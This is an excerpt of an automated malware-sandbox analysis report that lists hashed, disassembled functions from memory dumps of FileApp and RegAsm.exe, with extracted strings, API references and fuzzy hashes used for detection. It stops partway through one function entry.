Opcode Fuzzy Hash: 55f492b0e7ff8a41924c5a37d35bc986e9c933d8b0ffe98fce608810bb480ab0
Instruction Fuzzy Hash: 061198B4C46A698BDB608F24DA447EAB7B1FB06305F0061E9C00D73680D7B95AC98F48

Function 030A284A Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

O, xrefs: 030A2933
<, xrefs: 030A290F
!, xrefs: 030A2947
l, xrefs: 030A295A

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: !$<$O$l
API String ID: 0-3979395504
Opcode ID: 3a7eacd2f88a14f47d0008920ef0f797fbe14bcc8751aba56282998a638e3be6
Instruction ID: 529ebbb45fff951aa3b191ffeb2a4724d8f6071afc92a9d813cb30f4936dc7dd
Opcode Fuzzy Hash: 3a7eacd2f88a14f47d0008920ef0f797fbe14bcc8751aba56282998a638e3be6
Instruction Fuzzy Hash: 69217FB4D05A68CFDB65DF29D9547D9BBB6EF89701F0080E9D40EAA244EB780EC49F00

Function 030A330C Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

X, xrefs: 030A33C8
., xrefs: 030A335B
>, xrefs: 030A3367
2, xrefs: 030A339E

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: .$2$>$X
API String ID: 0-3503290858
Opcode ID: 56fb69a61cec92b14a420ebf8f4783596b7a42db13d139a2b3e8bab8083d6520
Instruction ID: 076d22b980194faccf53ac8894ca2fe4a7a330958eb978d5c98534728c2b3d0d
Opcode Fuzzy Hash: 56fb69a61cec92b14a420ebf8f4783596b7a42db13d139a2b3e8bab8083d6520
Instruction Fuzzy Hash: 7C11B3B4C52268CBDB609FA4D944BAEBBB0FF46341F0061DAD508B3680D7795EC4DE19

Function 030A2243 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

b, xrefs: 030A224D
5, xrefs: 030A22E6
?, xrefs: 030A232B
', xrefs: 030A22B5

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: '$5$?$b
API String ID: 0-817484716
Opcode ID: 98e48c2dfbf86c93b8e36d7c5a6b95743f48969889bf3d8720440e85081534a0
Instruction ID: 44cdb361aceb919e46859d22f79665bc8555348cc3e2151f3e088b075f37200a
Opcode Fuzzy Hash: 98e48c2dfbf86c93b8e36d7c5a6b95743f48969889bf3d8720440e85081534a0
Instruction Fuzzy Hash: 6321C2B8D0262A8BDB70CF68D8807EDBAF1AB05341F0044EA9019F7680EB758EC48F05

Function 030A66EA Relevance: 5.0, Strings: 4, Instructions: 44COMMON

Download Yara Rule

Strings

^, xrefs: 030A676F
*, xrefs: 030A679E
C, xrefs: 030A66F6
@, xrefs: 030A66EA

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: *$@$C$^
API String ID: 0-316158048
Opcode ID: 0abf75b35fa6c3a1d4531a055eedd1a35fd9eb1138fec70a706cd2f5be406914
Instruction ID: a43646874abd60bfa5307297bb92c85ab645dd37adb355ae12c741b2206c0b72
Opcode Fuzzy Hash: 0abf75b35fa6c3a1d4531a055eedd1a35fd9eb1138fec70a706cd2f5be406914
Instruction Fuzzy Hash: 8D1183B4D466688BDB609F64D9487EAB6B0BF0A341F1064E98519B3680D7B84B84CF48

Function 030A2556 Relevance: 5.0, Strings: 4, Instructions: 32COMMON

Download Yara Rule

Strings

E, xrefs: 030A2574
K, xrefs: 030A25C2
., xrefs: 030A2598
F, xrefs: 030A258C

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: .$E$F$K
API String ID: 0-1164033283
Opcode ID: 2e86fbdb4f0f4e84389d25c379586177cde0b7389b3446dd3ed07318f02fbbfa
Instruction ID: c0d38d6c3c1ab5efaed78c10b40e187e17f799de16aae7094d6ffc4b20947072
Opcode Fuzzy Hash: 2e86fbdb4f0f4e84389d25c379586177cde0b7389b3446dd3ed07318f02fbbfa
Instruction Fuzzy Hash: 94F0BDB4D567288BEB60CF64D944BAFFAB1EF42741F1021E5D109B3642D7798AC1DE08

Function 030A207F Relevance: 5.0, Strings: 4, Instructions: 27COMMON

Download Yara Rule

Strings

T, xrefs: 030A208B
), xrefs: 030A207F
&, xrefs: 030A20AD
W, xrefs: 030A20B9

Memory Dump Source

Source File: 00000000.00000002.2120244075.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30a0000_FileApp.jbxd

Similarity

API ID:
String ID: &$)$T$W
API String ID: 0-569328249
Opcode ID: b9c5f2ee9bbd8e85b13888d3477efb0d50e926ad3285af7b414b3df016579117
Instruction ID: 13ac02cfabf551caf29648b91f73b67733aab280ee2677f1fec0daa39f139e68
Opcode Fuzzy Hash: b9c5f2ee9bbd8e85b13888d3477efb0d50e926ad3285af7b414b3df016579117
Instruction Fuzzy Hash: 93F098B4C46A188ADB60CF55ED54BABF6B1AB07346F0071D5C00873184D7794A859E0C

Analysis Process: RegAsm.exePID: 420, Parent PID: 1340COMMON

Execution Graph

Execution Coverage:	19.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	107

Executed Functions

Function 00451300 Relevance: 44.5, APIs: 2, Strings: 22, Instructions: 2466COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00451418
__aulldiv.LIBCMT ref: 0045228D

Strings

%, xrefs: 004522F9
:, xrefs: 00452F9B
:, xrefs: 00453C1C
:, xrefs: 00452683
:, xrefs: 00452D55
:::, xrefs: 0045353B
:, xrefs: 004529EC
:, xrefs: 00452B0F
:, xrefs: 004530BE
:, xrefs: 004538B3
:, xrefs: 00452C32
:, xrefs: 0045366D
F, xrefs: 0045133E
:, xrefs: 004531E1
:, xrefs: 00453AF9
:, xrefs: 00452E78
:, xrefs: 00453790
:, xrefs: 004539D6
:, xrefs: 00453304
:, xrefs: 004527A6
:, xrefs: 004528C9
:, xrefs: 00453427

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:::$F
API String ID: 3732870572-3506045843
Opcode ID: 61577dcd977a4b0c8216b725fb810b313c32730d76070bfbf996a22843792f32
Instruction ID: 5905f41d2adb3526d95f358183e42a5573ccab8c25035b1c7de84a5765092963
Opcode Fuzzy Hash: 61577dcd977a4b0c8216b725fb810b313c32730d76070bfbf996a22843792f32
Instruction Fuzzy Hash: B44338709042688BCB25DF25CC91BEEB7B5AF45309F0441DED54AAB242DB386F88CF59

Function 004CF160 Relevance: 42.6, APIs: 6, Strings: 17, Instructions: 2340sleepprocessCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004CF383

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 004CF4BD
GetBinaryType.KERNEL32(?,FFFFFFFF,?), ref: 004D0500
Sleep.KERNEL32(000000C8), ref: 004D06FD
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004D0BE9
__aulldiv.LIBCMT ref: 004D1557

Strings

J, xrefs: 004D052E
a, xrefs: 004D0F24
&, xrefs: 004D0522
C, xrefs: 004D0F20
], xrefs: 004D0E6A
Oa*7*, xrefs: 004D0780
R="7<, xrefs: 004D1684
B, xrefs: 004D052A
U, xrefs: 004CFA69
D, xrefs: 004D0A17
p, xrefs: 004CFE51
jHF, xrefs: 004D12FD
D, xrefs: 004D0148
^, xrefs: 004CFE55
s, xrefs: 004D0E66
J, xrefs: 004D0532
rzz,, xrefs: 004D115E

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$BinaryCreateProcessSleepType
String ID: &$B$C$D$D$J$J$Oa*7*$R="7<$U$]$^$a$jHF$p$rzz,$s
API String ID: 1549270959-2376841863
Opcode ID: 7b32a8f3a03cbccd58262186a295f7fdb11eb99cdec2eddb06502c085f71b1d3
Instruction ID: bd1caa56c3ea751373c6a1f3c7fda9e7eae007f2256cd6336695c0d81bf49162
Opcode Fuzzy Hash: 7b32a8f3a03cbccd58262186a295f7fdb11eb99cdec2eddb06502c085f71b1d3
Instruction Fuzzy Hash: E34324B09042688FDB25CB64CC94BEEBBB1BF49304F0481EAD54967381DB786E89CF55

Function 00437680 Relevance: 41.8, APIs: 2, Strings: 20, Instructions: 3321COMMON

Download Yara Rule

Strings

!E@U@, xrefs: 00438B81
Z4;7?, xrefs: 00438A73
x, xrefs: 00438EA3
R63&3, xrefs: 00438D57
x, xrefs: 00438358
/, xrefs: 0043B33E
y, xrefs: 0043A97C
z, xrefs: 0043A8AA
Y=8-8, xrefs: 004388CD
9]XMX, xrefs: 004384B4
y, xrefs: 0043A980
U<%, xrefs: 00437CA1
U<%, xrefs: 00437BC8
t, xrefs: 004392C5
ii, xrefs: 0043AA8E
a, xrefs: 0043A7CD
c, xrefs: 0043A8AE
@, xrefs: 0043B9A4
8\YLY, xrefs: 0043868A
D %0%, xrefs: 00439179

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ii$!E@U@$/$8\YLY$9]XMX$@$D %0%$R63&3$U<%$U<%$Y=8-8$Z4;7?$a$c$t$x$x$y$y$z
API String ID: 0-1055176542
Opcode ID: 35a5b79090e8e4811614c6647994fb4b4f52e5b38bb1f9009629652fcbd64dc3
Instruction ID: fea99b8a72455c43b20efeb6998babb19f9a8269c71fe064cf8c269582dbf4a1
Opcode Fuzzy Hash: 35a5b79090e8e4811614c6647994fb4b4f52e5b38bb1f9009629652fcbd64dc3
Instruction Fuzzy Hash: 368303709092A88FDB25CB28CC94BEEBBB1AF49304F0481DAD54D67242CB796F85CF55

Function 004348B0 Relevance: 24.2, APIs: 3, Strings: 10, Instructions: 1456COMMON

Download Yara Rule

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 00435360
__aulldiv.LIBCMT ref: 004356B8
__aulldiv.LIBCMT ref: 00435A14

Strings

lku, xrefs: 0043548B
,, xrefs: 004349DF
kfoz, xrefs: 00435B28
=\OZN, xrefs: 004357F0
P, xrefs: 004349E3
/, xrefs: 00434A66
k, xrefs: 00435107
+ONGJR, xrefs: 00435DBA
f, xrefs: 00435103
S, xrefs: 00434A6A

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: +ONGJR$,$/$=\OZN$P$S$f$k$kfoz$lku
API String ID: 3732870572-656884431
Opcode ID: e005c7303f0f7a4d0e010a649f5c6b9d0ae2e3a8b2089908bd32019e9ce71d35
Instruction ID: c3164b18e73dfed1d5027f0166cf8289f44122d286b5e0d939a21ea5c169586f
Opcode Fuzzy Hash: e005c7303f0f7a4d0e010a649f5c6b9d0ae2e3a8b2089908bd32019e9ce71d35
Instruction Fuzzy Hash: 95E259B0D042688FDB24DB64CC95BEEBBB5BF89304F0481EAE50967241DB386E85CF55

Function 00431360 Relevance: 22.2, APIs: 10, Strings: 2, Instructions: 1186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 004314AA
__aulldiv.LIBCMT ref: 004317B9

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__fread_nolock.LIBCMT ref: 0043185F
__aulldiv.LIBCMT ref: 004318CB

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 00431A05
__aulldiv.LIBCMT ref: 00431B3A
__aulldiv.LIBCMT ref: 00431CFA
__fread_nolock.LIBCMT ref: 00431D51

Strings

z, xrefs: 004315BE
j, xrefs: 004315C2

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$__fread_nolock
String ID: j$z
API String ID: 3493607940-4214877792
Opcode ID: 866b5ba77d689868c272e52ec3de55dd71656acd071713fbe9c730dfad189035
Instruction ID: 04067cf01bf4830e75a96b80b27c0a4e747be80779cd42e5ff4ca72d12c04771
Opcode Fuzzy Hash: 866b5ba77d689868c272e52ec3de55dd71656acd071713fbe9c730dfad189035
Instruction Fuzzy Hash: 5DB26FB1D002189FDB24DF64CC91BEEBBB5BB88304F1481AAE509A7391DB385E85CF55

Function 004302C0 Relevance: 20.4, APIs: 10, Strings: 1, Instructions: 1186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 0043040A
__aulldiv.LIBCMT ref: 00430719

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__fread_nolock.LIBCMT ref: 004307BF
__aulldiv.LIBCMT ref: 0043082B

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 00430965
__aulldiv.LIBCMT ref: 00430A9A
__aulldiv.LIBCMT ref: 00430C5A
__fread_nolock.LIBCMT ref: 00430CB1

Strings

b, xrefs: 0043051A

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$__fread_nolock
String ID: b
API String ID: 3493607940-1908338681
Opcode ID: 1273cc25d529bf71b671caebb163ec881ba3e5ce2d311c74437816a485fd5d1b
Instruction ID: 72058cbddebab2f86bf2de92b5b78f6026ba6cbbc0e2bd338d31afb9be7e9ebe
Opcode Fuzzy Hash: 1273cc25d529bf71b671caebb163ec881ba3e5ce2d311c74437816a485fd5d1b
Instruction Fuzzy Hash: BEB26FB1D002189FEB24DF64CC91BEEBBB5BB88304F1481AAE509A7391DA345E85CF55

Function 004B0330 Relevance: 18.2, APIs: 2, Strings: 6, Instructions: 4224COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004B32E0

Strings

3, xrefs: 004B3E8F
F, xrefs: 004B4933
%, xrefs: 004B334C
), xrefs: 004B4456
&, xrefs: 004B38D3
', xrefs: 004B4059

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: 30f845462e2cf159f4cc3f57a8cdfada8e8b222eae666eccb7208ce998b38115
Instruction ID: d0eae2241b0cf9265d98228641de506ade6d2646ff857cd3e362114f9f35f71b
Opcode Fuzzy Hash: 30f845462e2cf159f4cc3f57a8cdfada8e8b222eae666eccb7208ce998b38115
Instruction Fuzzy Hash: 57B3DE709052688FDB65CB28CC90BEEBBB1BF89308F1481DAD44DA7252DB356E85CF54

Function 0046D250 Relevance: 17.3, APIs: 2, Strings: 6, Instructions: 3312COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0046F11F

Strings

%, xrefs: 0046F18B
&, xrefs: 0046F706
', xrefs: 0046FE44
F, xrefs: 00470751
), xrefs: 0047021D
3, xrefs: 0046FC8C

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: 7c431f6354fe6b78385ba9998c37aa3babe411a0a002cae92c58ce5cf09ca850
Instruction ID: 633a350edb2fc87989b6ba01922d55cb0008ed2d28fdd7f324ca571b7acc913f
Opcode Fuzzy Hash: 7c431f6354fe6b78385ba9998c37aa3babe411a0a002cae92c58ce5cf09ca850
Instruction Fuzzy Hash: F783FF70D052688FCB65CB28CC90BEEBBB1BF89308F0481DAD54DA7252DA356E85CF55

Function 00481170 Relevance: 16.6, APIs: 2, Strings: 6, Instructions: 2639COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00482423

Strings

), xrefs: 00483521
%, xrefs: 0048248F
3, xrefs: 00482F90
F, xrefs: 004839DA
&, xrefs: 00482A0A
', xrefs: 00483148

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: e9ead78bab1f3f73f2445888e9f31d9264798c8419502dd3f90348d58d018e98
Instruction ID: 952fd593d95633b9edd10221874c5a5ae23d3a3087215d00ee548c838d1386af
Opcode Fuzzy Hash: e9ead78bab1f3f73f2445888e9f31d9264798c8419502dd3f90348d58d018e98
Instruction Fuzzy Hash: 6A53F270D052688FCB25DB28CC90BEEBBB5AF89308F1481DAD549A7252DB346F85CF54

Function 0049A110 Relevance: 16.4, APIs: 2, Strings: 6, Instructions: 2351COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0049AE64

Strings

3, xrefs: 0049B9D1
&, xrefs: 0049B44B
), xrefs: 0049BF62
%, xrefs: 0049AED0
', xrefs: 0049BB89
F, xrefs: 0049C41B

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: c17468f3871c6b7254d6e581a90c586a4ad5e69e954b116e5c9f97a5d61c5796
Instruction ID: 08a730a68b76dc22f894f181a2fc71e8c54a3b49eaf929e5d632918578a916a5
Opcode Fuzzy Hash: c17468f3871c6b7254d6e581a90c586a4ad5e69e954b116e5c9f97a5d61c5796
Instruction Fuzzy Hash: 0E43F470D052688FCB65CB28CC90BEDBBB5BF89308F1481EAD509A7252DB346E85CF55

Function 00496BB0 Relevance: 16.2, APIs: 2, Strings: 6, Instructions: 2179COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00497511

Strings

F, xrefs: 00498BAA
', xrefs: 00498236
&, xrefs: 00497AF8
%, xrefs: 0049757D
), xrefs: 0049860F
3, xrefs: 0049807E

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: b93eb10f0a2f78b77c25d75b2311c8766cd72fe38dca1f4f73db7718789f67ce
Instruction ID: 6bcb941e483ff86e7b46929820bd4296a8c49ad155db8217973b0422e404b96f
Opcode Fuzzy Hash: b93eb10f0a2f78b77c25d75b2311c8766cd72fe38dca1f4f73db7718789f67ce
Instruction Fuzzy Hash: 7B33E470D052688FCB29CB68CC91BEDBBB5BF89304F1481EAD509A7252DB346E85CF54

Function 004B6D20 Relevance: 16.1, APIs: 2, Strings: 6, Instructions: 2107COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004B7524

Strings

', xrefs: 004B8249
%, xrefs: 004B7590
F, xrefs: 004B8BBD
&, xrefs: 004B7B0B
3, xrefs: 004B8091
), xrefs: 004B8622

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: 856cf368cb88302ada9afacab82521a074f411c7649ff0ce7372b393bd775249
Instruction ID: d03f2fe499a514f41050891708c6972ab28b083c9d59bd4dfe00ea9571b4cd83
Opcode Fuzzy Hash: 856cf368cb88302ada9afacab82521a074f411c7649ff0ce7372b393bd775249
Instruction Fuzzy Hash: 7433F270D052688FDB29CB68CC90BEDBBB5BF89308F1481DAD509A7252DB346E85CF54

Function 004BCDB0 Relevance: 15.8, APIs: 2, Strings: 6, Instructions: 1819COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004BD112

Strings

3, xrefs: 004BDBC2
', xrefs: 004BDD7A
), xrefs: 004BE153
F, xrefs: 004BE6EE
&, xrefs: 004BD645
%, xrefs: 004BD172

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: e8f0b6698f71b5c86f7a3e7621f95fc57e94f79994fc9b135b49692dc1dea4a1
Instruction ID: 273b8014927e751fc7d7358c7a0f8e45b7c54aca4d6f27f0a0d994a0d5d0f970
Opcode Fuzzy Hash: e8f0b6698f71b5c86f7a3e7621f95fc57e94f79994fc9b135b49692dc1dea4a1
Instruction Fuzzy Hash: AA130270D052688FCB29DB68CC91BEDBBB5BF89304F1481DAD50AA7242DB346E85CF54

Function 004BA530 Relevance: 15.7, APIs: 2, Strings: 6, Instructions: 1747
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 004BA77A

Strings

', xrefs: 004BB39D
F, xrefs: 004BBD11
&, xrefs: 004BACAA
%, xrefs: 004BA7DA
), xrefs: 004BB776
3, xrefs: 004BB1E5

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: c31837fa421b626951860f35d0e071bd0b36e897f9a7f7dbef93f345e0f1861f
Instruction ID: 8612ce13d74ffc955d201b516becd29ed3a0c6174f4aecbe8f711914457987ae
Opcode Fuzzy Hash: c31837fa421b626951860f35d0e071bd0b36e897f9a7f7dbef93f345e0f1861f
Instruction Fuzzy Hash: D513F170D052688FCB29DB68CC90BEDBBB5BF49308F1481DAD50AA7252DB346E85CF54

Function 0047E8A0 Relevance: 15.7, APIs: 2, Strings: 6, Instructions: 1747
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 0047EAEA

Strings

', xrefs: 0047F70D
3, xrefs: 0047F555
&, xrefs: 0047F01A
%, xrefs: 0047EB4A
), xrefs: 0047FAE6
F, xrefs: 00480081

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: %$&$'$)$3$F
API String ID: 3732870572-3526315295
Opcode ID: a7664fb7a946d5b0d74e73e274e2596ade98af22f097c4a06111a72f4abd3536
Instruction ID: fd5550fe2bfd66215863401a4ae7f40b853432828566d43adbbcbdf3bd1a13b7
Opcode Fuzzy Hash: a7664fb7a946d5b0d74e73e274e2596ade98af22f097c4a06111a72f4abd3536
Instruction Fuzzy Hash: 1C13F270D052688FCB29DF68CC90BEDBBB5BF49304F1481EAD50AA7252DB346A85CF54

Function 00436230 Relevance: 15.2, APIs: 2, Strings: 6, Instructions: 1184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|, xrefs: 00436C26
@, xrefs: 00436406
q, xrefs: 00436C22
<, xrefs: 00436402
C, xrefs: 00436486
?, xrefs: 0043648A

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: <$?$@$C$q$|
API String ID: 0-2527616589
Opcode ID: 53d6d4d16efb215adea2740d3eb0d237e5f90f0c4af83400321e965d4e51283f
Instruction ID: a4a08d6b2d08d597740c10beba96acd1c11e1c9286bde3c81b2e60263fb064b7
Opcode Fuzzy Hash: 53d6d4d16efb215adea2740d3eb0d237e5f90f0c4af83400321e965d4e51283f
Instruction Fuzzy Hash: 9CC268B1D002689FDB24DB64CC91BEEBBB5BF49304F0481EAE50967281DB386E85CF55

Function 00440A90 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 00440DB5
__aulldiv.LIBCMT ref: 00440E29

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__fread_nolock.LIBCMT ref: 00440FBF

Strings

#QA, xrefs: 00440BE0

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$__fread_nolock
String ID: #QA
API String ID: 3493607940-1731280056
Opcode ID: 026ce2f0e9655c0478fe90a3fc61c2dd5f5892cbe0c8aef62d174a1447463db9
Instruction ID: ab29d18d13d3ca3a70b0b1ec78e29b97a32d0bd9f7bcfaa0c0c17bcd156c36a0
Opcode Fuzzy Hash: 026ce2f0e9655c0478fe90a3fc61c2dd5f5892cbe0c8aef62d174a1447463db9
Instruction Fuzzy Hash: 3BF15AB1D002189FEB14DFA4CC81BEEBBB1BF88304F1481AAE509A7381D7786A45CF55

Function 00426D90 Relevance: 7.2, APIs: 2, Strings: 1, Instructions: 1923libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 004242B0: __aulldiv.LIBCMT ref: 00424643

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00428BAA
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00428D4F

Strings

Fyppe, xrefs: 00427065

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$__aulldiv
String ID: Fyppe
API String ID: 898380398-1102066067
Opcode ID: 036194ee21f69649c312e1dc25d417c97b5e3d41366bd4dae83cd291fec99348
Instruction ID: 4fa74ec30baec29ec2a88e0f031f0628c5d95e9e1969b6c811619e332c1b32b8
Opcode Fuzzy Hash: 036194ee21f69649c312e1dc25d417c97b5e3d41366bd4dae83cd291fec99348
Instruction Fuzzy Hash: B6231770E05268CFCB25CB68DC90BEEBBB1BF4A308F1481DAD449AB342D6355A85DF54

Function 004424E0 Relevance: 6.8, APIs: 4, Instructions: 789
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 004427A7
RegOpenKeyExA.KERNEL32(80000001,?,00000000,?,?), ref: 00442859
